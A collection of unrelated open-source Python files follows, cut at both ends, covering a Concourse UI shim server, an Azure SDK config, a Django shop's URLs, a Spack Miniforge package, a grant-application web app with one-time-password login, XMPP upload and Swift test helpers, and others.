_default_group = "builds"
def _pipeline(self, pipeline_name, job_names):
'''Return Concourse-compatible JSON for a single Pipeline.
A Pipeline contains multiple Jobs. I'm not really sure how
Groups fit in, but we only have 1 anyway.
'''
return dict(
name=pipeline_name,
url='/pipelines/%s' % pipeline_name,
paused=False,
groups=[
dict(
name=self._default_group,
jobs=job_names,
)
])
def _job(self, pipeline_name, job_name, dependee_jobs):
'''Return Concourse-compatible JSON for a single Job instance.
A Job (or task) is some work that needs to be done. Compiling some
source code is a Job, for example.
'''
def source_resource():
return dict(name="input", resource="input")
def output_resource(input_names):
if len(input_names) > 0:
return dict(name="output", resource="output", passed=input_names)
else:
return dict(name="output", resource="output")
inputs = [source_resource()]
if dependee_jobs:
inputs.append(output_resource(dependee_jobs))
return dict(
name=job_name,
url='/pipelines/%s/jobs/%s' % (pipeline_name, job_name),
next_build=None,
finished_build=None,
inputs=inputs,
outputs=[output_resource([])],
groups=[self._default_group]
)
def _resource(self, pipeline_name, resource_name, resource_type):
'''Return Concourse-compatible JSON for a single Resource instance.
A Resource is a generic input or output thing, such as a Git repository
that provides source code, or a package repository that contains build
output.
When using only the UI of Concourse, resources aren't that interesting.
'''
return dict(
name=resource_name,
type=resource_type,
groups=[],
url="/pipelines/%s/resources/%s" % (pipeline_name, resource_name),
)
def pipelines(self):
# Return a single pipeline called "main", containing all jobs.
nodes = self.build_graph.nodes(data=True)
all_job_names = [node_data['name'] for node_id, node_data in nodes]
pipeline = self._pipeline("main", all_job_names)
return json.dumps(pipeline)
def pipeline_jobs(self, pipeline):
# List all the jobs we know about.
jobs = []
for job_node_id, job_node_data in self.build_graph.nodes(data=True):
job_name = job_node_data['name']
# sorry
input_edges = self.build_graph.in_edges(job_node_id)
input_node_ids = [edge[0] for edge in input_edges]
input_job_names = [self.build_graph.node[i]['name'] for i in
input_node_ids]
job = self._job(pipeline, job_name, input_job_names)
jobs.append(job)
return json.dumps(jobs)
def pipeline_resources(self, pipeline):
resources = [self._resource(pipeline, name, type)
for name, type in
[("input", "git"), ("output", "github-release")]]
return json.dumps(resources)
def __init__(self, build_graph_node_link_data):
self.build_graph = networkx.readwrite.json_graph.node_link_graph(
build_graph_node_link_data)
self.app = bottle.Bottle()
self.app.route('/pipelines')(self.pipelines)
self.app.route('/pipelines/<pipeline>/jobs')(self.pipeline_jobs)
self.app.route('/pipelines/<pipeline>/resources')(self.pipeline_resources)
def main():
GRAPH = 'build-graph.json'
HOST = os.environ.get('HOST', '0.0.0.0')
PORT = os.environ.get('PORT', 8080)
with open(GRAPH) as f:
build_graph = json.load(f)
concourse_shim = ConcourseShim(build_graph)
# API requests under /api/v1/ go to the Concourse shim
root = bottle.Bottle()
root.mount('/api/v1', concourse_shim.app)
# Avoid 404 errors in these cases.
@root.route('/')
@root.route('/demo')
@root.route('/demo/')
def index_redirect():
return bottle.redirect('/demo/index.html')
# Everything else is treated as a file path, in the parent directory
# (so we can get at Concourse ATC's files inside the ../atc/ submodule.
@root.route('/<filepath:path>')
def serve_file(filepath):
return bottle.static_file(filepath, root='..')
bottle.run(root, host=HOST, port=PORT)
main()
| ssssam/generic-concourse-ui | demo/server.py | Python | apache-2.0 | 5,271 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, TYPE_CHECKING
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from azure.mgmt.core.policies import ARMHttpLoggingPolicy
from .._version import VERSION
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
class DevTestLabsClientConfiguration(Configuration):
"""Configuration for DevTestLabsClient.
Note that all parameters used to create this instance are saved as instance
attributes.
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: The subscription ID.
:type subscription_id: str
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
**kwargs: Any
) -> None:
if credential is None:
raise ValueError("Parameter 'credential' must not be None.")
if subscription_id is None:
raise ValueError("Parameter 'subscription_id' must not be None.")
super(DevTestLabsClientConfiguration, self).__init__(**kwargs)
self.credential = credential
self.subscription_id = subscription_id
self.api_version = "2018-09-15"
self.credential_scopes = kwargs.pop('credential_scopes', ['https://management.azure.com/.default'])
kwargs.setdefault('sdk_moniker', 'mgmt-devtestlabs/{}'.format(VERSION))
self._configure(**kwargs)
def _configure(
self,
**kwargs: Any
) -> None:
self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs)
self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs)
self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs)
self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs)
self.http_logging_policy = kwargs.get('http_logging_policy') or ARMHttpLoggingPolicy(**kwargs)
self.retry_policy = kwargs.get('retry_policy') or policies.AsyncRetryPolicy(**kwargs)
self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs)
self.redirect_policy = kwargs.get('redirect_policy') or policies.AsyncRedirectPolicy(**kwargs)
self.authentication_policy = kwargs.get('authentication_policy')
if self.credential and not self.authentication_policy:
self.authentication_policy = policies.AsyncBearerTokenCredentialPolicy(self.credential, *self.credential_scopes, **kwargs)
| Azure/azure-sdk-for-python | sdk/devtestlabs/azure-mgmt-devtestlabs/azure/mgmt/devtestlabs/aio/_configuration.py | Python | mit | 3,186 |
# -*- coding: utf-8 -*-
"""
Define the global constants for the problem.
"""
import math
import os
q = 0.5
b0 = 0.9
omegad = 2.0 / 3.0
l = 9.8
m = 1.0
g = 9.8
tmax = 1000
theta0_degree = 25.0
theta0 = math.radians(theta0_degree)
dt = 0.05
bstep = 0.05
path = "plots/"
os.system("pause")
| NicovincX2/Python-3.5 | Statistiques/Économétrie/Série temporelle/Damped-driven pendulum/tsa_constants.py | Python | gpl-3.0 | 299 |
# indent with 4 spaces (most editors can be set to
# put 4 spaces when hitting tab)
# if something is unclear, see
# http://wiki.ros.org/PyStyleGuide
# and
# http://legacy.python.org/dev/peps/pep-0008
# its recommended to check if the code follows the
# pep8 formatting with an linter.
# see http://legacy.python.org/dev/peps/pep-0257/
# for questions on documentation
# file has the same name as the class + .py
# each class has its own file.
#######
# NOTE:
# THIS CLASS IS COMPLETELY MISSING THE DOCUMENTATION
# GUIDLINE, TO BE ADDED SOON
#######
class SomeClass(object):
"""
This is the description for the class
Attributes: #only public attributes
* size(int): the size
"""
def __init__(self):
"""
init method
"""
super(SomeClass, self).__init__()
# a public attribute
self.size = 100
# called non public in python
# is equivalent to private in other languages
self.__password = "im private"
# _ as suffix stands for a protected attribute
self._username = "im protected"
# public attribute another_attribute
# with the python version of getters and
# setters.
# acess is mySomeClass.width = 20
# note that the attribute definition is with an
# underscore.
# only use this kind of defining the attribute
# if the property or setter method really does
# something.
self._width = 20
@property
def another_attribute(self):
return self._another_attribute
@another_attribute.setter
def another_attribute(self, value):
"""
example method with random text :)
:param value: The data to be published
:type value: RatedStatistics
:returns: MetadataStorageResponse
:raise ValueError: If the key is null or empty.
"""
if value > 40:
value = 40
self._another_attribute = value
# if the parameters are to long put them in new lines
# after the opening bracket. indent once.
def long_method_name(
self, var1, var2, var3,
var4, some_really_long_parameter):
pass
def _im_a_protected_method(self):
pass
def __im_a_private_method(self, arg1, arg2):
pass
@staticmethod
def i_am_a_function():
pass
| andreasBihlmaier/arni | code-examples/SomeClass.py | Python | bsd-2-clause | 2,386 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf.urls import url, include
from rest_framework import routers
from shop.forms.checkout import ShippingAddressForm, BillingAddressForm
from shop.views.address import AddressEditView
from shop.views.cart import CartViewSet, WatchViewSet
from shop.views.checkout import CheckoutViewSet
from shop.views.catalog import ProductSelectView
router = routers.DefaultRouter() # TODO: try with trailing_slash=False
router.register(r'cart', CartViewSet, base_name='cart')
router.register(r'watch', WatchViewSet, base_name='watch')
router.register(r'checkout', CheckoutViewSet, base_name='checkout')
urlpatterns = [
url(r'^select_product/?$',
ProductSelectView.as_view(),
name='select-product'),
url(r'^shipping_address/(?P<priority>({{\s*\w+\s*}}|\d+|add))$',
AddressEditView.as_view(form_class=ShippingAddressForm),
name='edit-shipping-address'),
url(r'^billing_address/(?P<priority>({{\s*\w+\s*}}|\d+|add))$',
AddressEditView.as_view(form_class=BillingAddressForm),
name='edit-billing-address'),
url(r'^', include(router.urls)),
]
| nimbis/django-shop | shop/urls/rest_api.py | Python | bsd-3-clause | 1,168 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Miniforge3(Package):
"""Miniforge3 is a minimal installer for conda specific to conda-forge."""
homepage = "https://github.com/conda-forge/miniforge"
url = "https://github.com/conda-forge/miniforge/releases/download/4.8.3-2/Miniforge3-4.8.3-2-Linux-x86_64.sh"
version('4.8.3-4-Linux-x86_64',
url='https://github.com/conda-forge/miniforge/releases/download/4.8.3-4/Miniforge3-4.8.3-4-Linux-x86_64.sh',
sha256='24951262a126582f5f2e1cf82c9cd0fa20e936ef3309fdb8397175f29e647646',
expand=False)
version('4.8.3-4-Linux-aarch64',
url='https://github.com/conda-forge/miniforge/releases/download/4.8.3-4/Miniforge3-4.8.3-4-Linux-aarch64.sh',
sha256='52a8dde14ecfb633800a2de26543a78315058e30f5883701da1ad2f2d5ba9ed8',
expand=False)
version('4.8.3-2-Linux-x86_64',
url='https://github.com/conda-forge/miniforge/releases/download/4.8.3-2/Miniforge3-4.8.3-2-Linux-x86_64.sh',
sha256='c8e5b894fe91ce0f86e61065d2247346af107f8d53de0ad89ec848701c4ec1f9',
expand=False)
version('4.8.3-2-Linux-aarch64',
url='https://github.com/conda-forge/miniforge/releases/download/4.8.3-2/Miniforge3-4.8.3-2-Linux-aarch64.sh',
sha256='bfefc0ede6354568978b4198607edd7f17c2f50ca4c6a47e9f22f8c257c8230a',
expand=False)
version('4.8.3-2-MacOSX-x86_64',
url='https://github.com/conda-forge/miniforge/releases/download/4.8.3-2/Miniforge3-4.8.3-2-MacOSX-x86_64.sh',
sha256='25ca082ab00a776db356f9bbc660edf6d24659e2aec1cbec5fd4ce992d4d193d',
expand=False)
def install(self, spec, prefix):
mkdirp(prefix)
pkgname = 'Miniforge3-{0}.sh'.format(self.version)
chmod = which('chmod')
chmod('+x', pkgname)
sh = which('sh')
sh('./{0}'.format(pkgname), '-b', '-f', '-s', '-p', prefix)
| LLNL/spack | var/spack/repos/builtin/packages/miniforge3/package.py | Python | lgpl-2.1 | 2,134 |
# -*- coding: utf-8 -*-
import os
import re
import json
import pathlib
from lxml import html
from dota import api
from dota.helpers import cached_games
def fetch_new_match_ids(match_ids_path):
"""
Get new match ids from datdota.
Parameters
----------
id_store : path to text file with matches already cached.
Returns
-------
new_ids : [str]
Notes
-----
id_store should be like '578918710\n'
"""
url = "http://www.datdota.com/matches.php"
r = html.parse(url).getroot()
reg = re.compile(r'match.*(\d{9})$')
links = filter(lambda x: reg.match(x[2]), r.iterlinks())
with match_ids_path.open() as f:
old_ids = f.readlines()
ids = (x[2].split('?q=')[-1] + '\n' for x in links)
new_ids = [x for x in ids if x not in old_ids]
return new_ids
def get_new_details(match_ids, data_path):
with open(os.path.expanduser('~/') + 'Dropbox/bin/api-keys.txt') as f:
key = json.load(f)['steam']
h = api.API(key=key)
cached = [int(x.stem) for x in cached_games(data_path)] # fragile...
new_matches = (x for x in match_ids if int(x) not in cached)
details = {mid: h.get_match_details(mid) for mid in new_matches}
return details
def write_new_details(details, data_path):
if not data_path.exists():
data_path.mkdir()
for k in details:
with (data_path / (str(k) + '.json')).open('w') as f:
json.dump(details[k].resp, f)
def get_pro_matches(id_store='pro_match_ids.txt',
data_path='~/sandbox/dota/data/pro/'):
"""
Find new match ids
Parameters
----------
id_store : str
data_path : str
"""
id_store = pathlib.Path(id_store)
data_path = pathlib.Path(os.path.expanduser(data_path))
match_ids_path = data_path / id_store
new_ids = fetch_new_match_ids(match_ids_path)
print("New matches found: {}".format(new_ids))
#--------------------------------------------------------------------------
# Write new ids and update match_ids by reading
with match_ids_path.open('a+') as f:
f.writelines(new_ids)
with match_ids_path.open() as f:
match_ids = [x.strip() for x in f.readlines()]
#--------------------------------------------------------------------------
# Get Match Details for new matches
details = get_new_details(match_ids, data_path)
write_new_details(details, data_path)
#--------------------------------------------------------------------------
# Insert into pro.db
from dota.sql.orm import update_db
update_db(data_path)
print("Added {}".format(new_ids))
if __name__ == '__main__':
# TODO: add argparser for id_store and data_path
get_pro_matches()
| TomAugspurger/dota | dota/scripts/get_pro_matches.py | Python | mit | 2,765 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import os
import time
import datetime
import string
import random
import re
from google.appengine.api import mail
from google.appengine.api import users
from google.appengine.ext import ndb
import jinja2
import webapp2
from Crypto.Hash import SHA256
import myapp
from models import *
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__) + '/../templates/'),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
class MainHandler(webapp2.RequestHandler):
__locked = True
__grace_locked = True
def dispatch(self):
self.__locked = myapp.time_locked(11, 18, 5)
self.__grace_locked = myapp.time_locked(11, 18, 7)
super(MainHandler, self).dispatch()
def render_form(self, grants_application, errors={}):
learning_associations = LearningAssociation.query().order(LearningAssociation.name).fetch(50)
while (len(grants_application.previous_grants) < 3):
grants_application.previous_grants.append(PreviousGrants())
while (len(grants_application.other_grants) < 3):
grants_application.other_grants.append(OtherGrants())
template_values = {
'application_year': myapp.APPLICATION_YEAR,
'learning_associations': learning_associations,
'grants_application': grants_application,
'errors': errors,
'is_locked': self.__locked
}
template = JINJA_ENVIRONMENT.get_template('application_form.html')
self.response.write(template.render(template_values))
def enum_params(self, class_name, params, target):
classes = {
'previous_grants': PreviousGrants,
'other_grants': OtherGrants
}
for i, item in enumerate(self.request.POST.getall('_'.join([class_name,params[0]]))):
model = classes[class_name]()
setattr(model, params[0], item)
setattr(model, params[1], self.request.POST.getall('_'.join([class_name,params[1]]))[i])
if not model == classes[class_name]():
target.append(model)
def get(self):
grants_application = TravelGrantsApplication()
self.render_form(grants_application)
def post(self):
if self.__grace_locked:
self.abort(403)
else:
grants_application = TravelGrantsApplication(parent=ndb.Key('Year', myapp.APPLICATION_YEAR))
errors = {}
for item in ['name', 'address', 'postal_code', 'postal_city', 'phone', 'email', 'organization', 'location', 'time_span', 'expenses', 'purpose', 'study_program']:
setattr(grants_application, item, self.request.POST.get(item))
if not getattr(grants_application, item):
errors[item] = 'missing'
elif item == 'email':
if not re.match(r"[^@]+@[^@]+\.[^@]+", grants_application.email):
errors[item] = 'invalid'
grants_application.learning_association = ndb.Key(urlsafe=self.request.POST.get('learning_association'))
learning_association = grants_application.learning_association.get()
if not learning_association:
errors['learning_association'] = 'missing'
self.enum_params('previous_grants', ['year','location'], grants_application.previous_grants)
self.enum_params('other_grants', ['provider','amount'], grants_application.other_grants)
if (len(errors) > 0):
self.render_form(grants_application, errors)
else:
grants_application.sent_at = datetime.datetime.now()
grants_application.put()
application_text = myapp.application_text(grants_application)
mail.send_mail(sender="Voksenopplæringsforbundet <vofo@vofo.no>",
to="%s <%s>" % (learning_association.name, learning_association.email),
subject="Reisestipendsøknad fra %s" % (grants_application.name),
body="""
Hei
Det har kommet en ny søknad om reisestipend til deres studieforbund.
Søknaden er fra %s (%s) og gjelder studiereise til %s i tidsrommet %s.
Gå til %sprioriter for å lese og prioritere søknader fra deres studieforbund.
Husk at fristen for å prioritere søknader er 28. november.
--
Hilsen Voksenopplæringsforbundet
""" % (grants_application.name,
grants_application.organization,
grants_application.location,
grants_application.time_span,
myapp.APPLICATION_URL))
mail.send_mail(sender="Voksenopplæringsforbundet <vofo@vofo.no>",
to="%s <%s>" % (grants_application.name, grants_application.email),
subject="Reisestipendsøknad til %s" % (learning_association.name),
body="""
Hei %s
Du har sendt søknad om reisestipend til %s.
%s
Ta kontakt med studieforbundet på %s hvis du har spørsmål.
--
Hilsen Voksenopplæringsforbundet
""" % (grants_application.name, grants_application.learning_association_name, application_text, learning_association.email))
template_values = {
'application_year': myapp.APPLICATION_YEAR,
'grants_application': grants_application,
'learning_association': learning_association
}
template = JINJA_ENVIRONMENT.get_template('hooray.html')
self.response.write(template.render(template_values))
class AdminHandler(webapp2.RequestHandler):
def dispatch(self):
"""This handler requires the current_user to be admin."""
if users.is_current_user_admin():
super(AdminHandler, self).dispatch()
else:
if users.get_current_user():
self.abort(403)
else:
self.redirect(users.create_login_url(self.request.uri))
def get_params(self):
return (self.request.get('sf') == 'new'), (self.request.get('sf').isdigit() and int(self.request.get('sf')) or self.request.get('sf'))
def get(self):
if self.request.get('sf'):
is_new, sf_id = self.get_params()
learning_association = is_new and LearningAssociation() or LearningAssociation.get_by_id(sf_id)
learning_associations = None
else:
learning_association = None
learning_associations = LearningAssociation.query().order(LearningAssociation.name).fetch(50)
template_values = {
'application_year': myapp.APPLICATION_YEAR,
'learning_association': learning_association,
'learning_associations': learning_associations
}
template = JINJA_ENVIRONMENT.get_template('admin_form.html')
self.response.write(template.render(template_values))
def post(self):
if self.request.get('sf'):
is_new, sf_id = self.get_params()
learning_association = is_new and LearningAssociation() or LearningAssociation.get_by_id(sf_id)
if learning_association:
learning_association.name = self.request.get('name')
learning_association.email = self.request.get('email')
learning_association.active = self.request.get('active') == 'true'
learning_association.put()
self.redirect('/admin')
def get_otp_by_token(token, fresh=False):
q = Otp.query(ndb.AND(Otp.token == token, Otp.valid_until > datetime.datetime.now()))
if fresh:
q = q.filter(Otp.is_signed_in == False)
return q.get()
class PrioritizeHandler(webapp2.RequestHandler):
__scope = None
__locked = True
def dispatch(self):
self.__scope = None
auth_token = self.request.cookies.get('auth_token')
if users.is_current_user_admin():
self.__locked = False
if self.request.get('logg_ut') == 'true':
self.redirect(users.create_logout_url('/prioriter'))
else:
self.__scope = TravelGrantsApplication.query(TravelGrantsApplication.application_year == myapp.APPLICATION_YEAR)
elif auth_token:
self.__locked = myapp.time_locked(11, 29, 5)
auth_token = SHA256.new(auth_token).hexdigest()
if self.request.get('logg_ut') == 'true':
ndb.delete_multi_async(Otp.query(ndb.OR(Otp.token==auth_token, Otp.valid_until<datetime.datetime.now())).fetch(options=ndb.QueryOptions(keys_only=True)))
self.response.delete_cookie('auth_token')
self.redirect('/prioriter')
else:
otp = get_otp_by_token(auth_token)
if otp:
self.__scope = TravelGrantsApplication.query(ndb.AND(TravelGrantsApplication.learning_association == otp.learning_association, TravelGrantsApplication.application_year == myapp.APPLICATION_YEAR))
otp.put() # Refresh expiration
super(PrioritizeHandler, self).dispatch()
def get(self):
if self.__scope:
prioritized_grants_applications = self.__scope.filter(TravelGrantsApplication.priority > 0).order(TravelGrantsApplication.priority).fetch()
grants_applications = self.__scope.filter(TravelGrantsApplication.priority < 1).order(TravelGrantsApplication.priority, TravelGrantsApplication.sent_at).fetch()
template_values = {
'application_year': myapp.APPLICATION_YEAR,
'grants_applications': grants_applications,
'prioritized_grants_applications': prioritized_grants_applications,
'TZONE': myapp.TZONE,
'UTC': myapp.UTC,
'is_admin': users.is_current_user_admin(),
'is_locked': self.__locked
}
if self.request.get('print') == 'true':
template = JINJA_ENVIRONMENT.get_template('prints.html')
else:
template = JINJA_ENVIRONMENT.get_template('prioritize.html')
self.response.write(template.render(template_values))
else:
template_values = {
'application_year': myapp.APPLICATION_YEAR,
'learning_associations': LearningAssociation.query().order(LearningAssociation.name).fetch(50)
}
template = JINJA_ENVIRONMENT.get_template('login.html')
self.response.write(template.render(template_values))
def post(self):
if self.__locked:
self.abort(403)
else:
item = self.__scope.filter(TravelGrantsApplication.key==ndb.Key(urlsafe=self.request.POST.get('grants_application'))).get()
if item:
if self.request.POST.get('priority').isdigit():
item.priority = int(self.request.POST.get('priority'))
elif self.request.POST.get('priority') == 'nil':
del item.priority
else:
self.abort(400)
item.put()
time.sleep(0.3)
self.redirect('/prioriter')
else:
self.abort(403)
class OtpHandler(webapp2.RequestHandler):
def post(self):
otp = Otp()
otp.learning_association = ndb.Key(urlsafe=self.request.POST.get('sf'))
otp_token = SHA256.new(str(otp.learning_association.id()) + ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(30))).hexdigest()
otp.token = SHA256.new(otp_token).hexdigest()
learning_association = otp.learning_association.get()
if learning_association:
otp.put()
mail.send_mail(sender="Voksenopplæringsforbundet <vofo@vofo.no>",
to="%s <%s>" % (learning_association.name, learning_association.email),
subject="Engangspassord til reisestipendsøknader",
body="""
Hei
For å logge inn til reisestipendsøknadene, bruk denne lenken:
%sotp/%s
Lenken er gyldig i en time.
Hilsen Voksenopplæringsforbundet
""" % (myapp.APPLICATION_URL, otp_token))
template_values = {
'application_year': myapp.APPLICATION_YEAR,
'learning_association': learning_association
}
template = JINJA_ENVIRONMENT.get_template('login_sent.html')
self.response.write(template.render(template_values))
else:
self.abort(400)
def get(self, token):
auth_token = SHA256.new(token).hexdigest()
otp = get_otp_by_token(auth_token, fresh=True)
if otp:
otp.is_signed_in = True
otp.put()
self.response.set_cookie('auth_token', token, expires=datetime.datetime.now() + datetime.timedelta(hours=6), secure=True)
self.redirect('/prioriter')
else:
template_values = {
'application_year': myapp.APPLICATION_YEAR
}
template = JINJA_ENVIRONMENT.get_template('login_failed.html')
self.response.write(template.render(template_values))
| vofo-no/reisestipend | myapp/views.py | Python | mit | 13,319 |
#!/usr/bin/env python
"""
Copyright 2012 GroupDocs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class ChangesResponse:
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually."""
def __init__(self):
self.swaggerTypes = {
'result': 'ChangesResult',
'status': 'str',
'error_message': 'str',
'composedOn': 'int'
}
self.result = None # ChangesResult
self.status = None # str
self.error_message = None # str
self.composedOn = None # int
| liosha2007/temporary-groupdocs-python3-sdk | groupdocs/models/ChangesResponse.py | Python | apache-2.0 | 1,137 |
#
# Candelabra
#
# Copyright Alvaro Saurin 2013 - All right Reserved
#
from logging import getLogger
from candelabra.plugins import CommandPlugin
from candelabra.boxes import boxes_storage_factory
from candelabra.errors import ImportException
logger = getLogger(__name__)
class ImportCommandPlugin(CommandPlugin):
NAME = 'import'
DESCRIPTION = "import a box from a file/URL."
def argparser(self, parser):
""" Parse arguments
"""
parser.add_argument('--input-format',
type=basestring,
dest='box_format',
default=None,
help='input format for the image')
parser.add_argument('-n',
'--name',
dest='box_name',
default=None,
type=str,
help='the box name')
parser.add_argument('--url',
dest='box_url',
default=None,
type=str,
help='a URL where the input image/box is imported from')
def run(self, args, command):
""" Run the command
"""
logger.info('running command "%s"', command)
boxes_storage = boxes_storage_factory()
if args.box_name is None:
raise ImportException('no name provided for the box')
if boxes_storage.has_box(args.box_name):
raise ImportException('there is already a box called "%s"', args.box_name)
if args.box_url is None:
raise ImportException('no URL provided for importing the box "%s"', args.box_name)
box = boxes_storage.get_box(name=args.box_name, url=args.box_url)
box.do_download()
command = ImportCommandPlugin()
| inercia/candelabra | candelabra/command/import/command.py | Python | bsd-2-clause | 1,875 |
# -*- coding: utf-8 -*-
import sqlalchemy
POOL_SIZE = 128
MYSQL_DEFAULT_CONFIGS = {
'user': 'wiki_bot',
'pass': '31415',
'host': 'localhost',
'port': '3306',
'database': 'wiki_ua',
}
def create_engine(configs=None):
configs = configs or MYSQL_DEFAULT_CONFIGS
url = u'mysql+pymysql://{user}:{pass}@{host}:{port}/' \
u'{database}?charset=utf8&use_unicode=1'.format(**configs)
return sqlalchemy.create_engine(url, pool_size=POOL_SIZE)
| Lamzin/wiki-parser | wiki_parser/configs/db.py | Python | gpl-3.0 | 481 |
from django.conf import settings
import elasticsearch
from django.core.exceptions import ImproperlyConfigured
import json
from tastypie.exceptions import BadRequest
try:
ES_PREFIX = settings.ES_PREFIX
except AttributeError:
raise ImproperlyConfigured(
"You must set the index prefix for cbh datastore")
import json
ES_MAIN_INDEX_NAME = "cbh_datastore_index"
def get_attachment_index_name(aid):
return "%s__temp_attachment_sheet__%d" % (ES_PREFIX, aid)
def get_index_name():
return ES_PREFIX + "__" + ES_MAIN_INDEX_NAME
def delete_main_index():
es = elasticsearch.Elasticsearch()
es.indices.delete(get_index_name(), ignore=[400, 404])
def get_client():
es = elasticsearch.Elasticsearch()
return es
def index_datapoint_classification(data, index_name=get_index_name(), refresh=True, decode_json=True):
if decode_json:
data = json.loads(data)
batches = [data]
if data.get("objects", "False") != "False":
batches = data["objects"]
es = elasticsearch.Elasticsearch(timeout=60)
store_type = "niofs"
create_body = {
"settings": {
"index.store.type": store_type
},
"mappings": {
"_default_": {
"_all": {"enabled": True},
"_source": {
"excludes": [
"*.project_data_all",
]
},
"dynamic_templates": [
{
"string_fields": {
"match": "*",
"match_mapping_type": "string",
"mapping": {
"type": "string", "store": "no", "index_options": "docs", "index": "analyzed",
"omit_norms": True,
"fields": {
"raw": {"type": "string", "store": "no", "index": "not_analyzed",
"ignore_above": 256}
}
}
}
}
]
}
}
}
es.indices.create(
index_name,
body=create_body,
ignore=400)
bulk_items = []
if len(batches) > 0:
for item in batches:
bulk_items.append({
"index":
{
"_id": str(item["id"]),
"_index": index_name,
"_type": "data_point_classifications"
}
})
bulk_items.append(item)
data = es.bulk(body=bulk_items, refresh=refresh)
if data["errors"]:
raise BadRequest(data)
| thesgc/cbh_datastore_ws | cbh_datastore_ws/elasticsearch_client.py | Python | mit | 2,821 |
# Copyright (C) 2019 Philipp Hörist <philipp AT hoerist.com>
#
# This file is part of nbxmpp.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; If not, see <http://www.gnu.org/licenses/>.
from nbxmpp.namespaces import Namespace
from nbxmpp.protocol import Iq
from nbxmpp.structs import HTTPUploadData
from nbxmpp.errors import HTTPUploadStanzaError
from nbxmpp.errors import MalformedStanzaError
from nbxmpp.task import iq_request_task
from nbxmpp.modules.base import BaseModule
ALLOWED_HEADERS = ['Authorization', 'Cookie', 'Expires']
class HTTPUpload(BaseModule):
def __init__(self, client):
BaseModule.__init__(self, client)
self._client = client
self.handlers = []
@iq_request_task
def request_slot(self, jid, filename, size, content_type):
_task = yield
response = yield _make_request(jid, filename, size, content_type)
if response.isError():
raise HTTPUploadStanzaError(response)
slot = response.getTag('slot', namespace=Namespace.HTTPUPLOAD_0)
if slot is None:
raise MalformedStanzaError('slot node missing', response)
put_uri = slot.getTagAttr('put', 'url')
if put_uri is None:
raise MalformedStanzaError('put uri missing', response)
get_uri = slot.getTagAttr('get', 'url')
if get_uri is None:
raise MalformedStanzaError('get uri missing', response)
headers = {}
for header in slot.getTag('put').getTags('header'):
name = header.getAttr('name')
if name not in ALLOWED_HEADERS:
raise MalformedStanzaError(
'not allowed header found: %s' % name, response)
data = header.getData()
if '\n' in data:
raise MalformedStanzaError(
'newline in header data found', response)
headers[name] = data
yield HTTPUploadData(put_uri=put_uri,
get_uri=get_uri,
headers=headers)
def _make_request(jid, filename, size, content_type):
iq = Iq(typ='get', to=jid)
attr = {'filename': filename,
'size': size,
'content-type': content_type}
iq.setTag(name="request",
namespace=Namespace.HTTPUPLOAD_0,
attrs=attr)
return iq
| gajim/python-nbxmpp | nbxmpp/modules/http_upload.py | Python | gpl-3.0 | 2,899 |
# Copyright (c) 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This stuff can't live in test/unit/__init__.py due to its swob dependency.
from copy import deepcopy
from hashlib import md5
from swift.common import swob
from swift.common.utils import split_path
from test.unit import FakeLogger, FakeRing
class FakeSwift(object):
"""
A good-enough fake Swift proxy server to use in testing middleware.
"""
def __init__(self):
self._calls = []
self.req_method_paths = []
self.swift_sources = []
self.uploaded = {}
# mapping of (method, path) --> (response class, headers, body)
self._responses = {}
self.logger = FakeLogger('fake-swift')
self.account_ring = FakeRing()
self.container_ring = FakeRing()
self.get_object_ring = lambda policy_index: FakeRing()
def _get_response(self, method, path):
resp = self._responses[(method, path)]
if isinstance(resp, list):
try:
resp = resp.pop(0)
except IndexError:
raise IndexError("Didn't find any more %r "
"in allowed responses" % (
(method, path),))
return resp
def __call__(self, env, start_response):
method = env['REQUEST_METHOD']
path = env['PATH_INFO']
_, acc, cont, obj = split_path(env['PATH_INFO'], 0, 4,
rest_with_last=True)
if env.get('QUERY_STRING'):
